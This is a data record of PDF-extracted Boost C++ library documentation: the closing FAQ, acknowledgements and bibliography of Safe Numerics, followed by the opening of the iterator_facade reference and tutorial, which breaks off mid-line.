safe_signed_literal<42> ? Why not just use std::integral_const<int,\n42>?\nBy defining our own \"special\" type we can simplify the interface. Using std::integral_const requires one to specify\nboth the type and the value. Using safe_signed_literal<42> doesn't require a parameter for the type. So the library\ncan select the best type to hold the specified value. It also means that one won't have the opportunity to specify a type-\nvalue pair which are inconsistent.\n11.4.Why is safe...literal needed at all? What's the matter with const safe<int>(42) ?\nconst safe<int>(42) looks like it might be what we want: An immutable value which invokes the \"safe\" operators\nwhen used in an expression. But there is one problem. The std::numeric_limits<safe<int>> is a range from\nINTMIN to INTMAX even though the value is fixed to 42 at compile time. It is this range which is used at compile time\nto calculate the range of the result of the operation.\nSo when an operation is performed, the range of the result is calculated from [INTMIN, INTMAX] rather than from\n[42,42].\n11.5.Are safe type operations constexpr ? That is, can they be invoked at compile time?\nYes. safe type construction and calculations are all constexpr . Note that to get maximum benefit, you'll have to use\nsafe...literal to specify the primitive values at compile time.\n11.6.Why define safe_literal ? Isn't it effectively the same as std::integral_constant ?\nAlmost, but there are still good reasons to create a different type.\n•std::integral_constant<int, 42> requires specification of type as well as value so it's less convenient than\nsafe_signed_literal which maps to the smallest type required to hold the value.\n•std::numeric_limits<std::integral_constant<int, 42>>::is_integer returns false. This would\ncomplicate implementation of the library\n•type trait is_safe<std::integral_constant<int, 42>> would have to be defined to return true.\n•But globally altering the traits of std::integral_constant might have unintended side-effects related to other code.\nThese might well be surprises which are create errors which are hard to find and hard to work around.\n11.7.Why is Boost.Convert not used?\nI couldn't figure out how to use it from the documentation.\n11.8.Why is the library named \"safe ...\" rather than something like \"checked ...\" ?\nI used \"safe\" in large part because this is what has been used by other similar libraries. Maybe a better word might have\nbeen \"correct\" but that would raise similar concerns. I'm not inclined to change this. I've tried to make it clear in the\ndocumentation what the problem that the library addressed is.\n11.9.Given that the library is called \"numerics\" why is floating point arithmetic not addressed?\nActually, I believe that this can/should be applied to any type T which satisfies the type requirement Numeric type as\ndefined in the documentation. So there should be specializations safe<float> and related types as well as new types like\nsafe<fixed_decimal> etc. But the current version of the library only addresses integer types. Hopefully the library will\nevolve to match the promise implied by its name.\n11.10.Isn't putting a defensive check just before any potential undefined behavior often considered a bad practice?\n81Safe Numerics\nBy whom? Is leaving code which can produce incorrect results better? Note that the documentation contains references\nto various sources which recommend exactly this approach to mitigate the problems created by this C/C++ behavior. See\n[Seacord]\n11.11.It looks like the implementation presumes two's complement arithmetic at the hardware level. So this library is not\nportable - correct? What about other hardware architectures?\nAs far as is known as of this writing, the library does not presume that the underlying hardware is two's complement.\nHowever, this has yet to be verified in any rigorous way.\n11.12.According to C/C++ standards, unsigned integers cannot overflow - they are modular integers which \"wrap around\".\nYet the safe numerics library detects and traps this behavior as errors. Why is that?\nThe guiding purpose of the library is to trap incorrect arithmetic behavior - not just undefined behavior. Although a savvy\nuser may understand and keep present in his mind that an unsigned integer is really a modular type, the plain reading of an\narithmetic expression conveys the idea that all operands are common integers. Also in many cases, unsigned integers\nare used in cases where modular arithmetic is not intended, such as array indices. Finally, the modulus for such an integer\nwould vary depending upon the machine architecture. For these reasons, in the context of this library, an unsigned\ninteger is considered to be a representation of a subset of integers. Note that this decision is consistent with [ INT30-C],\n“Ensure that unsigned integer operations do not wrap” in the CERT C Secure Coding Standard [ Seacord].\n11.13.Why does the library require C++14?\nThe original version of the library used C++11. Feedback from CPPCon, Boost Library Incubator and Boost developer's\nmailing list convinced me that I had to address the issue of run-time penalty much more seriously. I resolved to eliminate\nor minimize it. This led to more elaborate meta-programming. But this wasn't enough. It became apparent that the only\nway to really minimize run-time penalty was to implement compile-time integer range arithmetic - a pretty elaborate sub\nlibrary. By doing range arithmetic at compile-time, I could skip runtime checking on many/most integer operations. While\nC++11 constexpr wasn't quite powerful enough to do the job, C++14 constexpr is. The library currently relies very\nheavily on C++14 constexpr . I think that those who delve into the library will be very surprised at the extent that minor\nchanges in user code can produce guaranteed correct integer code with zero run-time penalty.\n11.14.This is a C++ library - yet you refer to C/C++. Which is it?\nC++ has evolved way beyond the original C language. But C++ is still (mostly) compatible with C. So most C programs\ncan be compiled with a C++ compiler. The problems of incorrect arithmetic afflict both C and C++. Suppose we have a\nlegacy C program designed for some embedded system.\n•Replace all int declarations with int16_t and all long declarations with int32_t .\n•Create a file containing something like the following and include it at the beginning of every source file.\n#ifdef TEST\n// using C++ on test platform\n#include <cstdint >\n#include <boost/numeric /safe_numerics /safe_integer .hpp>\n#include <cpp.hpp>\nusing pic16_promotion = boost::numeric ::cpp<\n 8, // char\n 8, // short\n 8, // int\n 16, // long\n 32 // long long\n>;\n// define safe types used in the desktop version of the program.\ntemplate <typename T> // T is char, int, etc data type\nusing safe_t = boost ::numeric ::safe<\n82Safe Numerics\n T,\n pic16_promotion ,\n boost::numeric ::default_exception_policy // use for compiling and running tests\n>;\ntypedef safe_t <std::int_least16_t > int16_t ;\ntypedef safe_t <std::int_least32_t > int32_t ;\n#else\n/* using C on embedded platform */\ntypedef int int_least16_t ;\ntypedef long int_least16_t ;\n#endif\n•Compile tests on the desktop with a C++14 compiler and with the macro TEST defined.\n•Run the tests and change the code to address any thrown exceptions.\n•Compile for the target C platform with the macro TEST undefined.\nThis example illustrates how this library, implemented with C++14 can be useful in the development of correct code for\nprograms written in C.\n11.15.Some compilers (including gcc and clang) include builtin functions for checked addition, multiplication, etc. Does this\nlibrary use these intrinsics?\nNo. I attempted to use these but they are currently not constexpr . So I couldn't use these without breaking constexpr\ncompatibility for the safe numerics primitives.\n11.16.Some compilers (including gcc and clang) included a builtin function for detecting constants. This seemed attractive\nto eliminate the requirement for the safe_literal type. Alas, these builtin functions are defined as macros. Constants\npassed through functions down into the safe numerics library cannot be detected as constants. So the opportunity to\nmake the library even more efficient by moving more operations to compile time doesn't exist - contrary to my hopes and\nexpections.\n12. Pending Issues\nThe library is under development. There are a number of issues still pending.\n12.1. safe_base Only Works for Scalar Types\nThe following is paraphrased from an issue raised by Andrzej Krzemie#ski as a github issue . It touches upon fundamental ideas\nbehind the library and how these ideas as the implementation of the library collided with reality.\n“In the current implementation safe<T> will only work with T being a C++ scalar type. Therefore making a general type\nrequirements that say what operations are allowed is superfluous, and confusing (because it implies that safe<> is more generic.”\nWhen I started out, It became clear that I wanted \"safe\" types to look like \"numeric\" types. It also became clear pretty soon that\nthere was going to be significant template meta-programming in the implementation. Normal type traits like std::is_integer are\ndefined in the std namespace and one is discouraged from extending it. Also I needed some compile time \"max\" and \"lowest\"\nvalues. This lead me to base the design on std::numeric_limits. But std::numeric limits is inherently extensible to any \"numeric\"\ntype. For example, money is a numeric type but not an intrinsic types. So it seemed that I needed to define a \"numeric\" concept\nwhich required that there be an implementation of std::numeric_limits for any type T - such as money in this case. When I'm\ndoubt - I tend to think big.\nFor now though I'm not going to address it. For what it's worth, my preference would be to do something like:\n83Safe Numerics\ntemplate <typename T>\nstruct range {\n T m_lowest ;\n T m_highest ;\n // default implementation\n range (\n const & T t_min, \n const & T t_max\n ) :\n m_lowest (std::numeric_limits <T>::lowest (t_min),\n m_highest (std::numeric_limits <T>::max(t_max)\n {}\n};\nThen redeclare safe_base , etc., accordingly.\nAlso note that for C++20, template value parameters are no longer restricted to integer primitive types but may be class types as\nwell. This means the library maybe extended to user class types without changing the current template signatures.\n12.2. Other Pending Issues\n•The library is currently limited to integers. If there is interest, it could be extended to floats and possible to user defined types.\n•Although care has been taken to make the library portable, at least some parts of the implementation - particularly checked\ninteger arithmetic - depend upon two's complement representation of integers. Hence the library is probably not currently\nportable to all other possible C++ architectures. These days, this is unlikely to be a limitation in practice. Starting with C++20,\ninteger arithmetic will be guaranteed by the C++ standard to be two's complement.\n•std::common_type is used in a variety of generic libraries, including std::chrono. Without a specialization for safe<T> s one\ncannot use the safe wrappers e.g. as a representation for std::chrono::duration .\n13. Acknowledgements\nThis library would never have been created without inspiration, collaboration and constructive criticism from multiple sources.\nDavid LeBlanc This library is inspired by David LeBlanc's SafeInt Library . I found this library very well\ndone in every way and useful in my embedded systems work. This motivated me to take it to\nthe \"next level\".\nAndrzej Krzemienski Andrzej Commented and reviewed the library as it was originally posted on the Boost Library\nIncubator. The consequent back and forth motivated me to invest more effort in developing\ndocumentation and examples to justify the utility, indeed the necessity, for this library. He\nalso noted many errors in code, documentation, and tests. Without his interest and effort, I do\nnot believe the library would have progressed beyond its initial stages.\nBoost As always, the Boost Developer's mailing list has been the source of many useful\nobservations from potential users and constructive criticism from very knowledgeable\ndevelopers. During the Boost formal review, reviews and comments were posted by the\nfollowing persons:\n•Paul A. Bristow\n•Steven Watanabe\n•John Maddock\n84Safe Numerics\n•Antony Polukhin\n•Barrett Adair\n•Vicente J. Botet Escriba\n•John McFarlane\n•Peter Dimov\n14. Release Log\nThis is the third version.\nRevision History\nRevision 1.69 29 September 2018\nFirst Boost Release\nRevision 1.70 9 March 2019\nFixed Exception Policies for trap and ignore.\n15. Bibliography\nBibliography\n[Coker] Zack Coker. Samir Hasan. Jeffrey Overbey. Munawar Hafiz. Christian Kästner. Integers In C: An Open Invitation To\nSecurity Attacks? . JTC1/SC22/WG21 - The C++ Standards Committee - ISOCPP . January 15, 2012.\n[Cook] John D. Cook. IEEE floating-point exceptions in C++ .\n[Crowl] Lawrence Crowl. C++ Binary Fixed-Point Arithmetic . JTC1/SC22/WG21 - The C++ Standards Committee - ISOCPP\n. January 15, 2012.\n[Crowl & Ottosen] Lawrence Crowl. Thorsten Ottosen. Proposal to add Contract Programming to C++ . WG21/N1962 and\nJ16/06-0032 - The C++ Standards Committee - ISOCPP . February 25, 2006.\n[Dietz] Will Dietz. Peng Li. John Regehr. Vikram Adve. Understanding Integer Overflow in C/C++ . Proceedings of the 34th\nInternational Conference on Software Engineering (ICSE), Zurich, Switzerland . June 2012.\n[Garcia] J. Daniel Garcia. C++ language support for contract programming . WG21/N4293 - The C++ Standards Committee -\nISOCPP . December 23, 2014.\n[Goldberg] David Goldberg. What Every Computer Scientist Should Know About Floating-Point Arithmetic . ACM Computing\nSurveys . March, 1991.\n[Katz] Omer Katz. SafeInt code proposal . Boost Developer's List .\n[keaton] David Keaton. Thomas Plum. Robert C. Seacord. David Svoboda. Alex Volkovitsky. Timothy Wilson. As-if Infinitely\nRanged Integer Model . Software Engineering Institute . CMU/SEI-2009-TN-023.\n[LeBlanc] David LeBlanc. Integer Handling with the C++ SafeInt Class . Microsoft Developer Network . January 7, 2004.\n[LeBlanc] David LeBlanc. SafeInt . CodePlex . Dec 3, 2014.\n[Lions] Jacques-Louis Lions. Ariane 501 Inquiry Board report . Wikisource . July 19, 1996.\n85Safe Numerics\n[Matthews] Hubert Matthews. CheckedInt: A Policy-Based Range-Checked Integer . Overload Journal #58 . December 2003.\n[Mouawad] Jad Mouawad. F.A.A Orders Fix for Possible Power Loss in Boeing 787 . New York Times. April 30, 2015.\n[Plakosh] Daniel Plakosh. Safe Integer Operations . U.S. Department of Homeland Security . May 10, 2013.\n[Seacord] Robert C. Seacord. Secure Coding in C and C++ . 2nd Edition. Addison-Wesley Professional. April 12, 2013.\n978-0321822130.\n[INT30-C] Robert C. Seacord. INT30-C. Ensure that operations on unsigned integers do not wrap . Software Engineering\nInstitute, Carnegie Mellon University . August 17, 2014.\n[INT32-C] Robert C. Seacord. INT32-C. Ensure that operations on signed integers do not result in overflow . Software\nEngineering Institute, Carnegie Mellon University . August 17, 2014.\n[Stone] David Stone. C++ Bounded Integer Library .\n[Stroustrup] Bjarn Stroustrup. The C++ Programming Language . Fourth Edition. Addison-Wesley . Copyright © 2014 by\nPearson Education, Inc.. January 15, 2012.\n[Forum] Forum Posts. C++ Binary Fixed-Point Arithmetic . ISO C++ Standard Future Proposals .\n86" } ]
{ "category": "App Definition and Development", "file_name": "iterator_facade.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "Iterator Facade\nAuthor : David Abrahams, Jeremy Siek, Thomas Witt\nContact : dave@boost-consulting.com ,jsiek@osl.iu.edu ,witt@ive.uni-hannover.de\nOrganization :Boost Consulting , Indiana University Open Systems Lab , University of\nHanover Institute for Transport Railway Operation and Construction\nDate : 2004-11-01\nCopyright : Copyright David Abrahams, Jeremy Siek, and Thomas Witt 2003.\nabstract: iterator_facade is a base class template that implements the interface of stan-\ndard iterators in terms of a few core functions and associated types, to be supplied by\na derived iterator class.\nTable of Contents\nOverview\nUsage\nIterator Core Access\noperator[]\noperator->\nReference\niterator_facade Requirements\niterator_facade operations\nTutorial Example\nThe Problem\nA Basic Iterator Using iterator_facade\nTemplate Arguments for iterator_facade\nDerived\nValue\nCategoryOrTraversal\nReference\nDifference\nConstructors and Data Members\nImplementing the Core Operations\nA constant node_iterator\nInteroperability\nTelling the Truth\nWrap Up\n1Overview\nWhile the iterator interface is rich, there is a core subset of the interface that is necessary for all the\nfunctionality. We have identified the following core behaviors for iterators:\n•dereferencing\n•incrementing\n•decrementing\n•equality comparison\n•random-access motion\n•distance measurement\nIn addition to the behaviors listed above, the core interface elements include the associated types\nexposed through iterator traits: value_type ,reference ,difference_type , and iterator_category .\nIterator facade uses the Curiously Recurring Template Pattern (CRTP) [ Cop95 ] so that the user\ncan specify the behavior of iterator_facade in a derived class. Former designs used policy objects to\nspecify the behavior, but that approach was discarded for several reasons:\n1.the creation and eventual copying of the policy object may create overhead that\ncan be avoided with the current approach.\n2.The policy object approach does not allow for custom constructors on the created\niterator types, an essential feature if iterator_facade should be used in other\nlibrary implementations.\n3.Without the use of CRTP, the standard requirement that an iterator’s opera-\ntor++ returns the iterator type itself would mean that all iterators built with the\nlibrary would have to be specializations of iterator_facade<...> , rather than\nsomething more descriptive like indirect_iterator<T*> . Cumbersome type gen-\nerator metafunctions would be needed to build new parameterized iterators, and\na separate iterator_adaptor layer would be impossible.\nUsage\nThe user of iterator_facade derives his iterator class from a specialization of iterator_facade and\npasses the derived iterator class as iterator_facade ’s first template parameter. The order of the other\ntemplate parameters have been carefully chosen to take advantage of useful defaults. For example,\nwhen defining a constant lvalue iterator, the user can pass a const-qualified version of the iterator’s\nvalue_type asiterator_facade ’sValue parameter and omit the Reference parameter which follows.\nThe derived iterator class must define member functions implementing the iterator’s core behaviors.\nThe following table describes expressions which are required to be valid depending on the category of\nthe derived iterator type. These member functions are described briefly below and in more detail in the\niterator facade requirements.\nExpression Effects\ni.dereference() Access the value referred to\ni.equal(j) Compare for equality with j\ni.increment() Advance by one position\ni.decrement() Retreat by one position\ni.advance(n) Advance by npositions\ni.distance_to(j) Measure the distance to j\n2In addition to implementing the core interface functions, an iterator derived from iterator_facade\ntypically defines several constructors. To model any of the standard iterator concepts, the iterator must\nat least have a copy constructor. Also, if the iterator type Xis meant to be automatically interoperate\nwith another iterator type Y(as with constant and mutable iterators) then there must be an implicit\nconversion from XtoYor from YtoX(but not both), typically implemented as a conversion constructor.\nFinally, if the iterator is to model Forward Traversal Iterator or a more-refined iterator concept, a default\nconstructor is required.\nIterator Core Access\niterator_facade and the operator implementations need to be able to access the core member functions\nin the derived class. Making the core member functions public would expose an implementation detail\nto the user. The design used here ensures that implementation details do not appear in the public\ninterface of the derived iterator type.\nPreventing direct access to the core member functions has two advantages. First, there is no possi-\nbility for the user to accidently use a member function of the iterator when a member of the value type\nwas intended. This has been an issue with smart pointer implementations in the past. The second and\nmain advantage is that library implementers can freely exchange a hand-rolled iterator implementation\nfor one based on iterator_facade without fear of breaking code that was accessing the public core\nmember functions directly.\nIn a naive implementation, keeping the derived class’ core member functions private would require\nit to grant friendship to iterator_facade and each of the seven operators. In order to reduce the\nburden of limiting access, iterator_core_access is provided, a class that acts as a gateway to the\ncore member functions in the derived iterator class. The author of the derived class only needs to grant\nfriendship to iterator_core_access to make his core member functions available to the library.\niterator_core_access will be typically implemented as an empty class containing only private\nstatic member functions which invoke the iterator core member functions. There is, however, no need\nto standardize the gateway protocol. Note that even if iterator_core_access used public member\nfunctions it would not open a safety loophole, as every core member function preserves the invariants\nof the iterator.\noperator[]\nThe indexing operator for a generalized iterator presents special challenges. A random access iterator’s\noperator[] is only required to return something convertible to its value_type . Requiring that it return\nan lvalue would rule out currently-legal random-access iterators which hold the referenced value in a\ndata member (e.g. counting_iterator ), because *(p+n) is a reference into the temporary iterator\np+n, which is destroyed when operator[] returns.\nWritable iterators built with iterator_facade implement the semantics required by the preferred\nresolution to issue 299 and adopted by proposal n1550 : the result of p[n] is an object convertible\nto the iterator’s value_type , and p[n] = x is equivalent to *(p + n) = x (Note: This result object\nmay be implemented as a proxy containing a copy of p+n). This approach will work properly for any\nrandom-access iterator regardless of the other details of its implementation. A user who knows more\nabout the implementation of her iterator is free to implement an operator[] that returns an lvalue in\nthe derived iterator class; it will hide the one supplied by iterator_facade from clients of her iterator.\noperator->\nThe reference type of a readable iterator (and today’s input iterator) need not in fact be a reference,\nso long as it is convertible to the iterator’s value_type . When the value_type is a class, however, it\nmust still be possible to access members through operator-> . Therefore, an iterator whose reference\n3type is not in fact a reference must return a proxy containing a copy of the referenced value from its\noperator-> .\nThe return types for iterator_facade ’soperator-> and operator[] are not explicitly specified.\nInstead, those types are described in terms of a set of requirements, which must be satisfied by the\niterator_facade implementation.\nReference\ntemplate <\nclass Derived\n, class Value\n, class CategoryOrTraversal\n, class Reference = Value&\n, class Difference = ptrdiff_t\n>\nclass iterator_facade {\npublic:\ntypedef remove_const<Value>::type value_type;\ntypedef Reference reference;\ntypedef Value* pointer;\ntypedef Difference difference_type;\ntypedef /* see below */ iterator_category;\nreference operator*() const;\n/* see below */ operator->() const;\n/* see below */ operator[](difference_type n) const;\nDerived& operator++();\nDerived operator++(int);\nDerived& operator--();\nDerived operator--(int);\nDerived& operator+=(difference_type n);\nDerived& operator-=(difference_type n);\nDerived operator-(difference_type n) const;\nprotected:\ntypedef iterator_facade iterator_facade_;\n};\n// Comparison operators\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type // exposition\noperator ==(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator !=(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\n[Cop95] [Coplien, 1995] Coplien, J., Curiously Recurring Template Patterns, C++ Report, February\n1995, pp. 24-27.\n4iterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator <(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator <=(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator >(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator >=(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\n// Iterator difference\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\n/* see below */\noperator-(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\n// Iterator addition\ntemplate <class Dr, class V, class TC, class R, class D>\nDerived operator+ (iterator_facade<Dr,V,TC,R,D> const&,\ntypename Derived::difference_type n);\ntemplate <class Dr, class V, class TC, class R, class D>\nDerived operator+ (typename Derived::difference_type n,\niterator_facade<Dr,V,TC,R,D> const&);\nThe iterator_category member of iterator_facade is\niterator-category (CategoryOrTraversal, value_type, reference)\nwhere iterator-category is defined as follows:\niterator-category (C,R,V) :=\nif (C is convertible to std::input_iterator_tag\n|| C is convertible to std::output_iterator_tag\n)\nreturn C\n5else if (C is not convertible to incrementable_traversal_tag)\nthe program is ill-formed\nelse return a type X satisfying the following two constraints:\n1. X is convertible to X1, and not to any more-derived\ntype, where X1 is defined by:\nif (R is a reference type\n&& C is convertible to forward_traversal_tag)\n{\nif (C is convertible to random_access_traversal_tag)\nX1 = random_access_iterator_tag\nelse if (C is convertible to bidirectional_traversal_tag)\nX1 = bidirectional_iterator_tag\nelse\nX1 = forward_iterator_tag\n}\nelse\n{\nif (C is convertible to single_pass_traversal_tag\n&& R is convertible to V)\nX1 = input_iterator_tag\nelse\nX1 = C\n}\n2.category-to-traversal (X) is convertible to the most\nderived traversal tag type to which X is also\nconvertible, and not to any more-derived traversal tag\ntype.\n[Note: the intention is to allow iterator_category to be one of the five original category tags when\nconvertibility to one of the traversal tags would add no information]\nThe enable_if_interoperable template used above is for exposition purposes. The member op-\nerators should only be in an overload set provided the derived types Dr1and Dr2are interoperable,\nmeaning that at least one of the types is convertible to the other. The enable_if_interoperable ap-\nproach uses SFINAE to take the operators out of the overload set when the types are not interoperable.\nThe operators should behave as-if enable_if_interoperable were defined to be:\ntemplate <bool, typename> enable_if_interoperable_impl\n{};\ntemplate <typename T> enable_if_interoperable_impl<true,T>\n{ typedef T type; };\ntemplate<typename Dr1, typename Dr2, typename T>\nstruct enable_if_interoperable\n: enable_if_interoperable_impl<\nis_convertible<Dr1,Dr2>::value || is_convertible<Dr2,Dr1>::value\n, T\n>\n{};\n6iterator_facade Requirements\nThe following table describes the typical valid expressions on iterator_facade ’sDerived parameter,\ndepending on the iterator concept(s) it will model. The operations in the first column must be made ac-\ncessible to member functions of class iterator_core_access . In addition, static_cast<Derived*>(iterator_facade*)\nshall be well-formed.\nIn the table below, Fisiterator_facade<X,V,C,R,D> ,ais an object of type X,bandcare objects of\ntype const X ,nis an object of F::difference_type ,yis a constant object of a single pass iterator type\ninteroperable with X, and zis a constant object of a random access traversal iterator type interoperable\nwith X.\niterator_facade Core Operations\nExpression Return Type Assertion/Note Used to implement It-\nerator Concept(s)\nc.dereference() F::reference Readable Iterator, Writable\nIterator\nc.equal(y) convertible to bool true iff candyrefer to the\nsame position.Single Pass Iterator\na.increment() unused Incrementable Iterator\na.decrement() unused Bidirectional Traversal Iter-\nator\na.advance(n) unused Random Access Traversal\nIterator\nc.distance_to(z) convertible to\nF::difference_typeequivalent to dis-\ntance(c, X(z)) .Random Access Traversal\nIterator\niterator_facade operations\nThe operations in this section are described in terms of operations on the core interface of Derived\nwhich may be inaccessible (i.e. private). The implementation should access these operations through\nmember functions of class iterator_core_access .\nreference operator*() const;\nReturns: static_cast<Derived const*>(this)->dereference()\noperator->() const; (seebelow )\nReturns: Ifreference is a reference type, an object of type pointer equal to:\n&static_cast<Derived const*>(this)->dereference()\nOtherwise returns an object of unspecified type such that, (*static_cast<Derived\nconst*>(this))->m is equivalent to (w = **static_cast<Derived const*>(this),\nw.m) for some temporary object wof type value_type .\nunspecified operator[](difference_type n) const;\nReturns: an object convertible to value_type . For constant objects vof type value_type ,\nandnof type difference_type ,(*this)[n] = v is equivalent to *(*this + n) = v ,\nandstatic_cast<value_type const&>((*this)[n]) is equivalent to static_cast<value_type\nconst&>(*(*this + n))\nDerived& operator++();\nEffects: static_cast<Derived*>(this)->increment();\nreturn *static_cast<Derived*>(this);\n7Derived operator++(int);\nEffects: Derived tmp(static_cast<Derived const*>(this));\n++*this;\nreturn tmp;\nDerived& operator--();\nEffects: static_cast<Derived*>(this)->decrement();\nreturn *static_cast<Derived*>(this);\nDerived operator--(int);\nEffects: Derived tmp(static_cast<Derived const*>(this));\n--*this;\nreturn tmp;\nDerived& operator+=(difference_type n);\nEffects: static_cast<Derived*>(this)->advance(n);\nreturn *static_cast<Derived*>(this);\nDerived& operator-=(difference_type n);\nEffects: static_cast<Derived*>(this)->advance(-n);\nreturn *static_cast<Derived*>(this);\nDerived operator-(difference_type n) const;\nEffects: Derived tmp(static_cast<Derived const*>(this));\nreturn tmp -= n;\ntemplate <class Dr, class V, class TC, class R, class D>\nDerived operator+ (iterator_facade<Dr,V,TC,R,D> const&,\ntypename Derived::difference_type n);\ntemplate <class Dr, class V, class TC, class R, class D>\nDerived operator+ (typename Derived::difference_type n,\niterator_facade<Dr,V,TC,R,D> const&);\nEffects: Derived tmp(static_cast<Derived const*>(this));\nreturn tmp += n;\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator ==(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\nReturns: ifis_convertible<Dr2,Dr1>::value\nthen ((Dr1 const&)lhs).equal((Dr2 const&)rhs) .\nOtherwise, ((Dr2 const&)rhs).equal((Dr1 const&)lhs) .\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator !=(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\n8Returns: ifis_convertible<Dr2,Dr1>::value\nthen !((Dr1 const&)lhs).equal((Dr2 const&)rhs) .\nOtherwise, !((Dr2 const&)rhs).equal((Dr1 const&)lhs) .\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator <(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\nReturns: ifis_convertible<Dr2,Dr1>::value\nthen ((Dr1 const&)lhs).distance_to((Dr2 const&)rhs) < 0 .\nOtherwise, ((Dr2 const&)rhs).distance_to((Dr1 const&)lhs) > 0 .\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator <=(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\nReturns: ifis_convertible<Dr2,Dr1>::value\nthen ((Dr1 const&)lhs).distance_to((Dr2 const&)rhs) <= 0 .\nOtherwise, ((Dr2 const&)rhs).distance_to((Dr1 const&)lhs) >= 0 .\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator >(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\nReturns: ifis_convertible<Dr2,Dr1>::value\nthen ((Dr1 const&)lhs).distance_to((Dr2 const&)rhs) > 0 .\nOtherwise, ((Dr2 const&)rhs).distance_to((Dr1 const&)lhs) < 0 .\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,bool>::type\noperator >=(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\nReturns: ifis_convertible<Dr2,Dr1>::value\nthen ((Dr1 const&)lhs).distance_to((Dr2 const&)rhs) >= 0 .\nOtherwise, ((Dr2 const&)rhs).distance_to((Dr1 const&)lhs) <= 0 .\ntemplate <class Dr1, class V1, class TC1, class R1, class D1,\nclass Dr2, class V2, class TC2, class R2, class D2>\ntypename enable_if_interoperable<Dr1,Dr2,difference>::type\noperator -(iterator_facade<Dr1,V1,TC1,R1,D1> const& lhs,\niterator_facade<Dr2,V2,TC2,R2,D2> const& rhs);\nReturn Type: ifis_convertible<Dr2,Dr1>::value\nthen difference shall be iterator_traits<Dr1>::difference_type .\nOtherwise difference shall be iterator_traits<Dr2>::difference_type\nReturns: ifis_convertible<Dr2,Dr1>::value\nthen -((Dr1 const&)lhs).distance_to((Dr2 const&)rhs) .\nOtherwise, ((Dr2 const&)rhs).distance_to((Dr1 const&)lhs) .\n9Tutorial Example\nIn this section we’ll walk through the implementation of a few iterators using iterator_facade , based\naround the simple example of a linked list of polymorphic objects. This example was inspired by a\nposting by Keith Macdonald on the Boost-Users mailing list.\nThe Problem\nSay we’ve written a polymorphic linked list node base class:\n# include <iostream>\nstruct node_base\n{\nnode_base() : m_next(0) {}\n// Each node manages all of its tail nodes\nvirtual ~node_base() { delete m_next; }\n// Access the rest of the list\nnode_base* next() const { return m_next; }\n// print to the stream\nvirtual void print(std::ostream& s) const = 0;\n// double the value\nvirtual void double_me() = 0;\nvoid append(node_base* p)\n{\nif (m_next)\nm_next->append(p);\nelse\nm_next = p;\n}\nprivate:\nnode_base* m_next;\n};\nLists can hold objects of different types by linking together specializations of the following template:\ntemplate <class T>\nstruct node : node_base\n{\nnode(T x)\n: m_value(x)\n{}\nvoid print(std::ostream& s) const { s << this->m_value; }\nvoid double_me() { m_value += m_value; }\nprivate:\nT m_value;\n};\n10And we can print any node using the following streaming operator:\ninline std::ostream& operator<<(std::ostream& s, 